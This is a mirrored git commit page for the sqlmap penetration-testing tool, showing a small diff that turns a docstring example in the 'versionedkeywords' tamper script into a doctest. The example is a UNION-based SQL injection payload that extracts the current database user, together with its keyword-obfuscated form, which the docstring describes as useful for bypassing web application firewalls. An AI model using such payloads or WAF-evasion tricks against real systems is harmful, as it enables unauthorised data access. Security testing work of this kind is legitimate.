PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2026-01-04 13:49:05 +00:00
Code Issues Projects Releases Wiki Activity

Another update for an Issue #352 and couple of fixes

Browse Source
This commit is contained in:
Miroslav Stampar
2013-03-13 21:57:09 +01:00
parent b35122a42c
commit 4cb378ce3e
38 changed files with 127 additions and 146 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
tamper/versionedkeywords.py
View File

@@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
"""
Encloses each non-function keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement:
* MySQL
@@ -35,6 +31,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
"""
def process(match):